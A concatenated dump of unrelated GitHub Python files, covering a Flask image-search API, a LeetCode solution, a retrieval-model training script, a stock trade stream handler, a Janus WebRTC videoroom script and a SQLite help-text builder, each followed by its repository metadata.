)\n\n\ndef getSearch(whereSql, resultTitle, placeholder=()):\n illustCount = getSearchCountResult(whereSql, placeholder)\n if illustCount == 0:\n return jsonify(status=404, message=\"No matched illusts.\")\n return getSearchResult(whereSql, illustCount, resultTitle, placeholder)\n\n\nsearch_api = Blueprint('search_api', __name__)\n\n#\n# 検索結果画面 関連 (キーワード/タグ/作者/キャラ/画像 とかは全部パラメータで取る)\n#\n\n\n@search_api.route(\"/tag\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByTag():\n tagID = request.args.get('id', default=None, type=int)\n if not tagID:\n return jsonify(status=400, message=\"tagID is required.\")\n tagName = g.db.get(\n \"SELECT tagName FROM info_tag WHERE tagID = %s\",\n (tagID,)\n )\n if not tagName:\n return jsonify(status=404, message=\"The tag was not found\")\n whereSql = f\"\"\"illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={tagID})\"\"\"\n return getSearch(whereSql, tagName[0][0])\n\n\n@search_api.route(\"/artist\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByArtist():\n artistID = request.args.get('id', default=None, type=int)\n if not artistID:\n return jsonify(status=400, message=\"artistID is required.\")\n artistName = g.db.get(\n \"SELECT artistName FROM info_artist WHERE artistID = %s\",\n (artistID,)\n )\n if not artistName:\n return jsonify(status=404, message=\"The artist was not found\")\n whereSql = f\"data_illust.artistID = {artistID}\"\n return getSearch(whereSql, artistName[0][0])\n\n\n@search_api.route(\"/uploader\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByUploader():\n uploaderID = request.args.get('id', default=None, type=int)\n if not uploaderID:\n return jsonify(status=400, message=\"uploaderID is required.\")\n uploaderName = g.db.get(\n \"SELECT userName FROM data_user WHERE userID = %s\",\n (uploaderID,)\n )\n if not uploaderName:\n return jsonify(status=404, message=\"The user was not found\")\n whereSql = f\"data_illust.userID = {uploaderID}\"\n return getSearch(whereSql, uploaderName[0][0])\n\n\n@search_api.route(\"/character\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByCharacter():\n charaID = request.args.get('id', default=None, type=int)\n if not charaID:\n return jsonify(status=400, message=\"charaID is required.\")\n charaName = g.db.get(\n \"SELECT tagName FROM info_tag WHERE tagID = %s\",\n (charaID,)\n )\n if not charaName:\n return jsonify(status=404, message=\"The chara was not found\")\n whereSql = f\"\"\"illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={charaID})\"\"\"\n return getSearch(whereSql, charaName[0][0])\n\n\n@search_api.route(\"/keyword\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByKeyword():\n keyword = request.args.get(\"keyword\", default=None, type=str)\n if not keyword:\n return jsonify(status=400, message=\"keyword is required.\")\n whereSql = \"illustName LIKE %s\"\n return getSearch(whereSql, keyword, (\"%\"+keyword+\"%\",))\n\n\n@search_api.route('/all', methods=[\"GET\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByAll():\n whereSql = \"1 = 1\"\n return getSearch(whereSql, \"全て\")\n\n\n@search_api.route('/random', methods=[\"GET\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\ndef searchByRandom():\n '''\n REQ\n nsfw= 1/0\n artistID=NUMBER\n tagID=NUMBER\n charaID=NUMBER\n '''\n acceptNsfw = request.args.get('nsfw', default=0, type=int)\n artistID = request.args.get('artistID', default=0, type=int)\n tagID = request.args.get('tagID', default=0, type=int)\n charaID = request.args.get('charaID', default=0, type=int)\n count = request.args.get('count', default=1, type=int)\n acceptNsfw = 1 if acceptNsfw else 0\n count = 10 if count > 10 else count\n # 完全ランダム\n if (not artistID) and (not tagID) and (not charaID):\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension,illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustNsfw={acceptNsfw} AND illustStatus=0\n ORDER BY RAND() LIMIT {count}\"\"\"\n )\n # 作者指定ランダム\n elif artistID:\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension, illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustNsfw={acceptNsfw}\n AND data_illust.artistID={artistID}\n AND illustStatus=0\n ORDER BY RAND() LIMIT {count}\"\"\"\n )\n # タグ指定ランダム\n # キャラ指定ランダム\n else:\n # つまりタグIDなので握りつぶす\n if charaID:\n tagID = charaID\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension, illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={tagID})\n AND illustStatus=0\n AND illustNsfw={acceptNsfw} ORDER BY RAND() LIMIT {count}\"\"\"\n )\n if not illusts:\n return jsonify(\n status=200,\n message=\"not found\",\n data={\n \"imgs\": []\n }\n )\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n return jsonify(\n status=200,\n message=\"found\",\n data={\n \"imgs\": [{\n \"illustID\": illust[0],\n \"artistID\": illust[1],\n \"title\": illust[2],\n \"caption\": illust[3],\n \"date\": illust[4],\n \"pages\": illust[5],\n \"like\": illust[6],\n \"mylist\": mylistDict[str(illust[0])],\n \"originUrl\": illust[7],\n \"originService\": illust[8],\n \"nsfw\": illust[9],\n \"artist\": {\n \"name\": illust[10]\n },\n \"extension\": illust[11]\n } for illust in illusts]\n }\n )\n\n\n@search_api.route('/image', methods=[\"POST\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\ndef searchByImage():\n if g.userPermission not in [0, 9]:\n return jsonify(status=400, message=\"Bad request\")\n if \"file\" not in request.files:\n return jsonify(status=400, message=\"File must be included\")\n file = request.files['file']\n # ファイル拡張子確認\n if isNotAllowedFile(file.filename):\n return jsonify(status=400, message=\"The file is not allowed\")\n with TemporaryDirectory() as temp_path:\n # 画像を一旦保存して確認\n uniqueID = str(uuid4()).replace(\"-\", \"\")\n uniqueID = b64encode(uniqueID.encode(\"utf8\")).decode(\"utf8\")[:-1]\n tempPath = os.path.join(temp_path, uniqueID)\n file.save(tempPath)\n fileExt = what_img(tempPath)\n if not fileExt:\n return jsonify(status=400, message=\"The file is not allowed\")\n # 大丈夫そうなのでハッシュ値を作成して検索\n hash = int(str(imagehash.phash(Image.open(tempPath))), 16)\n # 検索SQL\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n BIT_COUNT(illustHash ^ %s) AS SAME,\n illustName, illustDescription, illustDate, illustPage, illustLike,\n illustOriginUrl, illustOriginSite, illustNsfw, artistName,\n illustExtension,illustStatus\n FROM `data_illust`\n INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n HAVING SAME < 5 AND illustStatus=0 ORDER BY SAME DESC LIMIT 10\"\"\",\n (hash,)\n )\n if len(illusts):\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n # 自分がマイリストしたかどうかを気合で取ってくる\n mylistedDict = getMylistedDict(illustIDs)\n illusts = [{\n \"illustID\": i[0],\n \"artistID\": i[1],\n \"similarity\": i[2],\n \"title\": i[3],\n \"caption\": i[4],\n \"date\": i[5].strftime('%Y-%m-%d %H:%M:%S'),\n \"pages\": i[6],\n \"like\": i[7],\n \"mylist\": mylistDict[str(i[0])],\n \"mylisted\": mylistedDict[str(i[0])],\n \"originUrl\": i[8],\n \"originService\": i[9],\n \"nsfw\": i[10],\n \"artist\": {\n \"name\": i[11]\n },\n \"extension\": i[12]\n } for i in illusts]\n else:\n illusts = []\n # データベースから検索\n return jsonify(\n status=200,\n message='ok',\n data={\n 'hash': str(hash),\n 'illusts': illusts\n }\n )\n\n#\n# 高度な検索(複数タグ等)\n#\n\n# 複数条件での検索処理\n# 1. まずキーワードからタグ一覧を取ってくる(tags/find から取ってくる)\n# 2. タグ一覧を tagIdsとして渡して 応答に返ってくるイラストIDを取得する\n# (TODO:search系列と同様の動作をするように修正)\n\n# OR検索の例\n# SELECT illustID,tagID FROM `data_tag` WHERE tagID IN (1,2,3)\n#\n# AND検索の例\n# SELECT illustID,tagID FROM `data_tag` GROUP BY illustID\n# HAVING SUM(tagID='1') AND SUM(tagID='2')\n# または\n# SELECT illustID FROM テーブル WHERE tagID=? AND illustID\n# IN (それまでに取得したillustIDリスト)\n# を forで回せばいい\n\n\n@search_api.route(\"/multiple/tag\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByMultipleTag():\n # パラメータの確認\n tagID = request.args.get('id', default=None, type=str)\n if not tagID:\n return jsonify(status=400, message=\"tagID is required.\")\n # あんまり長いと負荷がかかりそうなので制限\n tagID = [str(int(t)) for t in tagID.split(',') if t.isdigit()]\n tagID = tagID[:5] if len(tagID) > 5 else tagID\n filterHaving = ' AND '.join([f\"SUM(tagID='{t}')\" for t in tagID])\n # カウント取得\n baseWhere = f\"\"\"\n (SELECT illustID FROM data_tag GROUP BY illustID HAVING {filterHaving})\n \"\"\"\n illustCount = g.db.get(f\"SELECT COUNT(illustID) FROM {baseWhere} AS T1\")\n if not illustCount:\n return jsonify(status=404, message=\"No matched illusts.\")\n # タグ名取得\n tagName = g.db.get(\n f\"SELECT tagName FROM info_tag WHERE tagID In ({','.join(tagID)})\"\n )\n tagName = \" \".join([t[0] for t in tagName])\n # 検索結果取得\n whereSql = f\"illustID IN {baseWhere}\"\n return getSearchResult(whereSql, illustCount[0][0], tagName)\n","repo_name":"nuxt-image-board/backend","sub_path":"api/blueprints/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":17130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35174389479","text":"class Solution:\n def checkStraightLine(self, coordinates: List[List[int]]) -> bool:\n x0 = coordinates[0][0]\n y0 = coordinates[0][1]\n x1 = coordinates[1][0]\n y1 = coordinates[1][1]\n \n if x1 - x0 is not 0:\n dxdy0 = (y1 - y0)/(x1 - x0)\n else:\n dxdy0 = -1\n for x, y in coordinates[2:]:\n dx = x - x0\n dy = y - y0\n if dx is not 0:\n dydx = dy/dx\n else:\n dydx = -1\n \n if dydx != dxdy0:\n return False\n \n return True\n","repo_name":"JuneKim/algorithm","sub_path":"ProblemSolving/LeetCode/1232_CheckIfItIsAStraightLine.py","file_name":"1232_CheckIfItIsAStraightLine.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28009835405","text":"'''\n\nhttps://github.com/beir-cellar/beir/blob/main/examples/retrieval/training/train_sbert.py\n\nThis examples show how to train a basic Bi-Encoder for any BEIR dataset without any mined hard negatives or triplets.\nThe queries and passages are passed independently to the transformer network to produce fixed sized embeddings.\nThese embeddings can then be compared using cosine-similarity to find matching passages for a given query.\nFor training, we use MultipleNegativesRankingLoss. There, we pass pairs in the format:\n(query, positive_passage). Other positive passages within a single batch becomes negatives given the pos passage.\nWe do not mine hard negatives or train triplets in this example.\n'''\nimport pathlib, os\nimport logging\nimport wandb\n\nfrom typing import Dict, Type, List, Callable, Iterable, Tuple\nfrom tqdm.autonotebook import trange\nfrom sentence_transformers.readers import InputExample\n\nfrom sentence_transformers import losses, models, SentenceTransformer\n\nfrom beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.train import TrainRetriever\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n#### /print debug information to stdout\n\n\ndef train(corpus, queries, qrels, dev_corpus, dev_queries, dev_qrels, model_name=\"xlm-roberta-base\", train_loss='cosine', pretrained_model=True):\n\n dev_available = False\n if dev_corpus is not None and dev_queries is not None and dev_qrels is not None:\n dev_available = True\n\n dataset = 'doc2doc'\n\n #### Provide any sentence-transformers or HF model\n if not pretrained_model:\n #word_embedding_model = models.Transformer(model_name, max_seq_length=350)\n word_embedding_model = models.Transformer(model_name, max_seq_length=512)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n print(\"successfully created model\")\n \n #### Or provide pretrained sentence-transformer model\n else:\n model = SentenceTransformer(model_name)\n\n retriever = TrainRetriever(model=model, batch_size=16)\n\n \"\"\"\n word_embedding_model = models.Transformer('bert-base-uncased', max_seq_length=256)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n \n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n \n \n word_embedding_model = models.Transformer('bert-base-uncased', max_seq_length=256)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension())\n dense_model = models.Dense(in_features=pooling_model.get_sentence_embedding_dimension(), out_features=256, activation_function=nn.Tanh())\n \n model = SentenceTransformer(modules=[word_embedding_model, pooling_model, dense_model])\n \"\"\"\n\n #### Prepare training samples\n train_samples = retriever.load_train(corpus, queries, qrels)\n print(\"successfully load train\")\n train_dataloader = retriever.prepare_train(train_samples, shuffle=True)\n\n #### Training SBERT with cosine-product\n if train_loss == 'cosine':\n train_loss = losses.MultipleNegativesRankingLoss(model=retriever.model)\n #### training SBERT with dot-product\n else:\n train_loss = losses.MultipleNegativesRankingLoss(model=retriever.model, similarity_fct=util.dot_score)\n\n #### Prepare dev evaluator\n if dev_available:\n ir_evaluator = retriever.load_ir_evaluator(dev_corpus, dev_queries, dev_qrels)\n #### If no dev set is present from above use dummy evaluator\n else:\n ir_evaluator = retriever.load_dummy_evaluator()\n\n #### Provide model save path\n model_save_path = os.path.join(pathlib.Path(__file__).parent.absolute(), \"output\",\n \"{}-v1-{}\".format(model_name, dataset))\n os.makedirs(model_save_path, exist_ok=True)\n print(\"successfully created set up training\")\n\n #### Configure Train params\n num_epochs = 1\n evaluation_steps = 5000\n warmup_steps = int(len(train_samples) * num_epochs / retriever.batch_size * 0.1)\n\n retriever.fit(train_objectives=[(train_dataloader, train_loss)],\n evaluator=ir_evaluator,\n epochs=num_epochs,\n output_path=model_save_path,\n warmup_steps=warmup_steps,\n evaluation_steps=evaluation_steps,\n use_amp=True)\n\n\n","repo_name":"Stern5497/Doc2docBeirIR","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26538381278","text":"import pathlib\nimport sys\nfrom AlpacaStream.AlpacaDataStream import AlpacaDataStream\nfrom models import Quotes, Stocks, BarHour, BarMinute, BarDaily, Trades\nfrom helpers import insert_into_database\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger(\"__name__\")\nNY = 'America/New_York'\n\nasync def tradehandler(trades):\n \"\"\"\n Processes trade data received through AlpacaDataStream API and saves it to a database using helper functions.\n\n Args:\n trades: A trade object received from AlpacaDataStream API.\n\n Returns:\n None.\n \"\"\"\n print(trades.__dict__)\n trades_df = pd.DataFrame(trades.__dict__)\n trades_df = trades_df.transpose()\n trades_df['timestamp'] = pd.to_datetime(trades_df['timestamp'], unit='ns')\n trades_df.timestamp = trades_df.timestamp.dt.tz_localize('UTC').dt.tz_convert(NY)\n trades_df.rename(columns={\"symbol\":\"ticker\",\"id\":\"trade_id\"}, inplace=True)\n insert_into_database(Trades, trades_df.to_dict(orient=\"records\"))\n\ndef run_trades_stream(tickers):\n \"\"\"\n Initiates a stream of trade data using AlpacaDataStream API and processes the received data using the tradehandler() function.\n\n Args:\n tickers: A list of ticker symbols for which to receive trade data.\n\n Returns:\n None.\n \"\"\"\n alpaca_obj = AlpacaDataStream()\n try:\n print(\"streaming data for {} stocks\".format(len(tickers)))\n alpaca_obj.get_streams(\"trades\", tickers, tradehandler)\n logger.info(\"streaming trades started\")\n except Exception as e:\n logger.error(\"there was some error streaming trades data \\n Error Details:{}\".format(e))\n raise e\n\nif __name__ == \"__main__\":\n symbols = [\"AAPL\", \"MSFT\"]\n run_trades_stream(symbols)\n\n\n\n \n\n\n","repo_name":"faisalanjum/Data-Alpaca","sub_path":"backend/db/stream_trades.py","file_name":"stream_trades.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2903731850","text":"import requests\nimport json\nimport random\nimport string\nimport time\n\napi = 'http://localhost:8088/janus'\n\n\ndef randomString(stringLength=8):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\ndef call(data):\n data['transaction'] = randomString()\n return requests.post(api, data=json.dumps(data)).json()\n\n\ndef call_session(session, data):\n url = \"{}/{}\".format(api, session)\n data['transaction'] = randomString()\n return requests.post(url, data=json.dumps(data)).json()\n\n\ndef call_handle(session, handle, data):\n url = \"{}/{}/{}\".format(api, session, handle)\n data['transaction'] = randomString()\n return requests.post(url, data=json.dumps(data)).json()\n\n\ndef mk_session():\n return call({'janus': 'create'})['data']['id']\n\n\ndef mk_handle(session):\n return call_session(session, {'janus': 'attach', 'plugin': 'janus.plugin.videoroom'})['data']['id']\n\n\ndef get_events(session):\n url = \"{}/{}?maxev=1\".format(api, session)\n return requests.get(url).json()\n\n\ndef get_pub_ids(session, handle):\n response = call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'listparticipants', 'room': 1234}})\n participants = response['plugindata']['data']['participants']\n return [part['id'] for part in participants if part['publisher'] == True]\n\n\ndef subscribe(session, handle, pubid):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'join',\n 'ptype': 'subscriber',\n 'room': 1234,\n 'feed': pubid,\n 'video': True,\n }})\n\n\ndef join_pub(session, handle):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'join',\n 'ptype': 'publisher',\n 'room': 1234,\n }})\n\n\ndef offer(session, handle, sdp):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'configure',\n 'audio': True,\n 'video': True\n },\n 'jsep': {\n 'type': 'offer',\n 'trickle': False,\n 'sdp': sdp\n }\n })\n\n\ndef start_send(session, handle, sdp):\n return call_handle(session, handle, {'janus': 'message', 'body': {\n 'request': 'start',\n },\n 'jsep': {\n 'type': 'answer',\n 'sdp': sdp\n }\n })\n\n\ndef leave(session, handle):\n return call_handle(session, handle, {'janus': 'message', 'body': {'request': 'leave', }})\n\n\ndef detach(session):\n return call_session(session, {'janus': 'detach'})\n\n\nsession = mk_session()\nhandle = mk_handle(session)\npub_ids = get_pub_ids(session, handle)\nsubscribe(session, handle, pub_ids[0])\n\nsdp_offer = get_events(session)['jsep']['sdp']\n\npub_handle = mk_handle(session)\njoin_pub(session, pub_handle)\noffer(session, pub_handle, sdp_offer)\nprint('Send offer')\nget_events(session)\nsdp_answer = get_events(session)['jsep']['sdp']\nstart_send(session, handle, sdp_answer)\n\nfor x in range(2):\n print(get_events(session))\n\ntime.sleep(10)\nleave(session, pub_handle)\nleave(session, handle)\ndetach(session)\n","repo_name":"software-mansion-labs/janus_experiments","sub_path":"videoroom_loop.py","file_name":"videoroom_loop.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38887506767","text":"def observed():\n observations=[]\n for i in range (6):\n temp=input(\"add an item to the list\\n\")\n observations.append(temp)\n return observations\n\ndef run():\n print(f\"Counting observations\")\n observations=observed()\n observations_set = set()\n for observation in observations:\n data = (observation, observations.count(observation))\n observations_set.add(data)\n for data in observations_set:\n print(f\"{data[0]} observed {data[1]} times.\")\n\nif \"__main__\":\n run()\n","repo_name":"Will-2332/COM411","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33098828688","text":"\"\"\"\n String Compression\n Cracking the coding interview, 6th edition, page 91\n\"\"\"\n\n\nclass StringCompression:\n def __init__(self, string: str) -> None:\n self.string = string\n\n def compress(self) -> str:\n if len(self.string) <= 2:\n return self.string\n list_string: list[str] = list(self.string)\n list_compress: list[str or int] = list()\n count_char: int = 0\n for i in range(len(list_string)):\n count_char += 1\n if i + 1 >= len(list_string) or list_string[i] != list_string[i+1]:\n list_compress.extend([list_string[i], str(count_char)])\n count_char = 0\n if len(list_string) <= len(list_compress):\n return self.string\n return ''.join(list_compress)\n\n","repo_name":"Hesam-Eskandari/CrackingCodingInterview-Python","sub_path":"ArraysAndStrings/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31691939772","text":"import string\n\n# this will probably be GODJUL, let's check.\ninp = 90101894\nletters = ''\n\nwhile 1:\n l = inp % 26\n letters = string.ascii_uppercase[l-1] + letters\n\n if inp < 26:\n break\n\n inp //= 26\n\nprint(letters)","repo_name":"matslindh/codingchallenges","sub_path":"knowit2016/knowit24.py","file_name":"knowit24.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"14647524025","text":"class Error:\n def __init__(\n self, exception: str,\n module: str, url: str,\n msg: str, status_code: int\n ):\n \"\"\"\n :param exception: An exception\n :param module: A module where an exception occurred\n :param url: A url of parsed resource\n :param msg: A message with additional information\n :param status_code: A status code of request\n \"\"\"\n\n self.exception = exception\n self.module = module\n self.msg = msg\n self.url = url\n self.status_code = status_code\n\n def json(self, ) -> dict[str, str]:\n return {\n \"msg\": self.msg,\n \"type\": self.exception,\n \"module\": self.module,\n \"url\": self.url,\n \"status_code\": self.status_code\n }\n","repo_name":"DmitriDanshin/deutsche-sprache","sub_path":"utils/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34957946698","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER steps\n# 2. STRING path\n#\n\ndef countingValleys(steps, path):\n stack = []\n flag = -1\n valleys = 0\n for i in range(steps):\n if (path[i] == 'U' and len(stack) == 0):\n stack.append(0)\n flag = 0\n elif (path[i] == 'D' and len(stack) == 0):\n stack.append(1)\n flag = 1\n elif (path[i] == 'D' and flag == 0):\n stack.pop()\n elif (path[i] == 'U' and flag == 0):\n stack.append(1)\n elif (path[i] == 'D' and flag == 1):\n stack.append(1)\n elif (path[i] == 'U' and flag == 1):\n stack.pop()\n if(flag == 1 and len(stack) == 0):\n valleys = valleys + 1\n return valleys\n\nif __name__ == '__main__':\n fptr = sys.stdout\n\n steps = int(input().strip())\n\n path = input()\n\n result = countingValleys(steps, path)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"abinezer/HackerRank-Problem-Solving","sub_path":"prep/CountingValleys.py","file_name":"CountingValleys.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17190671551","text":"# Given inorder and postorder traversal of a tree, construct the binary tree.\n# Note:\n# You may assume that duplicates do not exist in the tree.\n# For example, given\n# inorder = [9,3,15,20,7]\n# postorder = [9,15,7,20,3]\n# Return the following binary tree:\n\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n return self.buildTreeRec(0,\n len(postorder) - 1, 0,\n len(inorder) - 1, inorder, postorder)\n\n def buildTreeRec(self, postStart, postEnd, inStart, inEnd, inorder,\n postorder):\n # print('inStart = {}, inEnd = {}, postEnd = {}'.format(\n # inStart, inEnd, postEnd))\n if postStart > postEnd or inStart > inEnd:\n return None\n\n root = TreeNode(postorder[postEnd])\n for i in range(inStart, inEnd + 1):\n if root.val == inorder[i]:\n inMid = i\n # print('inMid = ', inMid)\n break\n\n # postStart remains same, inMid-inStart gives number of elem in left subtree\n # postEnd index should be one less than the number of items in left subtree such that \n # postStart..postEnd index correctly represent left subtree in post order traversal.\n # postEnd = postStart + inMid - inStart -1\n root.left = self.buildTreeRec(postStart,\n postStart + inMid - inStart - 1, inStart,\n inMid - 1, inorder, postorder)\n\n # postEnd is reduced by one because that's the end of the right subtree. To find the start of the right subtree\n # postStart is incremented by number of items in between inMid and inStart i.e. \n # postStart = postStart + inMid - inStart\n root.right = self.buildTreeRec(postStart + inMid - inStart,\n postEnd - 1, inMid + 1, inEnd, inorder,\n postorder)\n return root\n\n\ndef main():\n inorder = [9, 3, 15, 20, 7]\n postorder = [9, 15, 7, 20, 3]\n root = Solution().buildTree(inorder, postorder)\n\n\nif __name__ == '__main__':\n main()","repo_name":"gauravtatke/codetinkering","sub_path":"leetcode/LC106_bintree_from_postorder_inorder.py","file_name":"LC106_bintree_from_postorder_inorder.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7642271932","text":"# solved python search path for import module in other sub directories\nimport sys\nimport os\nfrom numpy import insert, piecewise\ncurrent_working_directory = os.getcwd()\nsys.path.append(current_working_directory)\n\n############################################################################\n\n\ndef sqlite_help():\n help = \"\"\n\n # header\n header = \"\\n\"\n header += \" SQLite Help :\"\n header += \"\\n\"\n header += \"\\n\"\n\n # data type\n data_type = \"\\n\"\n data_type += \" data_type\"\n data_type += \"\\n\"\n data_type += \" sqllite have 5 dataType : NULL, INTEGER, REAL, TEXT, BLOB\"\n data_type += \"\\n\"\n data_type += \" REAL : The values is a floating point value, stored as an 8-byte IEEE floating point number.\"\n data_type += \"\\n\"\n data_type += \" BLOB : The value is a blob of data, stored exactly as it was input.\"\n data_type += \"\\n\"\n data_type += \"\\n\"\n\n # Show tables\n show_tables = \"\\n\"\n show_tables += \" show all tables with structures\"\n show_tables += \"\\n\"\n show_tables += \" tables\"\n show_tables += \"\\n\"\n show_tables += \"\\n\"\n\n\n\n # Select\n select = \"\\n\"\n select += \" Select\"\n select += \"\\n\"\n select += \" SELECT * FROM TableName\"\n select += \"\\n\"\n select += ' SELECT * FROM employees WHERE last=?\", (\"Schafer\",)'\n select += \"\\n\"\n select += ' SELECT * FROM employees WHERE last=:last\", {\"last\": \"Doe\"}'\n select += \"\\n\"\n select += \"\\n\"\n\n # show all tables\n all_tables = \"\\n\"\n all_tables += \" show all tables\"\n all_tables += \"\\n\"\n all_tables += \" SELECT * FROM sqlite_master where type='table';\"\n all_tables += \"\\n\"\n all_tables += \"\\n\"\n\n # show special table\n special_table = \"\\n\"\n special_table += \" show a special table\"\n special_table += \"\\n\"\n special_table += \" show tableName\"\n special_table += \"\\n\"\n special_table += \" exp : show EDL_DATE_FORMAT\"\n special_table += \"\\n\"\n special_table += \"\\n\"\n\n\n # Insert\n insert_db = \"\\n\"\n insert_db += \" Insert\"\n insert_db += \"\\n\"\n insert_db += \" Suggested format :\"\n insert_db += \"\\n\"\n insert_db += ' INSERT INTO people (first_name, last_name) VALUES (\"John\", \"Smith\");'\n insert_db += \"\\n\"\n insert_db += \" Other format :\"\n insert_db += \"\\n\"\n insert_db += \" INSERT INTO EDL_DATE_FORMAT VALUES (1, 'feedName', 'cus_date', 'YYYYMMDD', 'file')\"\n insert_db += \"\\n\"\n insert_db += \" insert data with python class :\"\n insert_db += \"\\n\"\n insert_db += \" emp_1 = Employee('John', 'Doe', 80000)\"\n insert_db += \"\\n\"\n insert_db += ' \"INSERT INTO employees VALUES (?, ?, ?)\", (emp_1.first, emp_1.last, emp_1.pay)'\n insert_db += \"\\n\"\n insert_db += ' \"INSERT INTO employees VALUES (:first, :last, :pay)\", \"{\"first\": emp_1.first, \"last\": emp_1.last, \"pay\": emp_1.pay}'\n insert_db += \"\\n\"\n insert_db += \"\\n\"\n\n # Update\n update_db = \"\\n\"\n update_db += \" Update\"\n update_db += \"\\n\"\n update_db += \" UPDATE table_name SET column_name = 'something' WHERE condition;\"\n update_db += \"\\n\"\n update_db += \" UPDATE employeesSET lastname = 'Smith' WHERE employeeid = 3;\"\n update_db += \"\\n\"\n update_db += \"\\n\"\n\n # delete\n delete_db = \"\\n\"\n delete_db += \" delete\"\n delete_db += \"\\n\"\n delete_db += \" drop table main.tableName\"\n delete_db += \"\\n\"\n delete_db += \"\\n\"\n\n\n\n help += header\n help += 